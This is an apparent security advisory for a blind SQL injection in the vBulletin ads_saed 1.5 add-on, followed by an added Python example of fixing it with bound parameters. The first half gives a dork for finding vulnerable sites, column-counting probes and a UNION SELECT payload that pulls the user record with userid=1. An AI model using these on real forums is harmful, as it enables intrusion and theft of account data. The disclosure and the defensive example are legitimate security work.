vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home : www.IQ-TY.com
Mail : darkangel_G85@yahoo.com
___________________________________
## script name : ads_saed
## d0rk : inurl:"vb/bnnr.php"
## Example :
Go to url : http://server/vb/bnnr.php
The "user name" input is vulnerable to blind SQL injection:
user name = ' ORDER BY 15/*
user name = ' ORDER BY 16/*
Now view the page source : " Unknown column '16' in 'order clause'" (ORDER BY 15 is accepted and ORDER BY 16 is rejected, so the query returns 15 columns)
exploit :
user name =
' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*
# Solution : see
http://www.traidnt.net/vb/showthread.php?t=1102593
or update to the new version of the product
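
The fix for this class of bug is to bind the "user name" value as a parameter instead of pasting it into the SQL text. The sketch below is an added example, not code from ads_saed or from the advisory's author: it runs the advisory's two ORDER BY probes against a concatenated query and a bound query. It assumes an in-memory SQLite database standing in for MySQL, and the table and column names are hypothetical.

```python
import sqlite3

# Constructed stand-in for the add-on's table: 15 columns, the count the
# advisory's ORDER BY probes reveal. Table and column names are hypothetical.
COLS = ["username"] + [f"c{i}" for i in range(2, 16)]

# The two probe values shown in the advisory, verbatim.
PROBES = ["' ORDER BY 15/*", "' ORDER BY 16/*"]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE banner ({', '.join(COLS)})")
    db.execute("INSERT INTO banner (username) VALUES ('alice')")
    return db


def _run(db, sql, params=()):
    # Return ("ok", row_count) or ("sql_error", message) so both paths compare.
    try:
        return ("ok", len(db.execute(sql, params).fetchall()))
    except sqlite3.Error as exc:
        return ("sql_error", str(exc))


def lookup_concat(db, username):
    # Vulnerable pattern: the form value becomes part of the SQL text, so the
    # quote closes the string and the rest is parsed as SQL.
    return _run(db, "SELECT * FROM banner WHERE username = '" + username + "'")


def lookup_bound(db, username):
    # Hardened pattern: the value is bound as data and is never parsed as SQL.
    return _run(db, "SELECT * FROM banner WHERE username = ?", (username,))


def compare():
    db = make_db()
    return {p: (lookup_concat(db, p), lookup_bound(db, p)) for p in PROBES}


if __name__ == "__main__":
    for probe, (concat, bound) in compare().items():
        print(f"{probe!r}\n  concatenated: {concat}\n  bound:        {bound}")
```

With concatenation the two probes produce different outcomes (success versus a database error), which is the signal the advisory relies on; with binding both are treated as an unknown user name and return the same empty result.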
End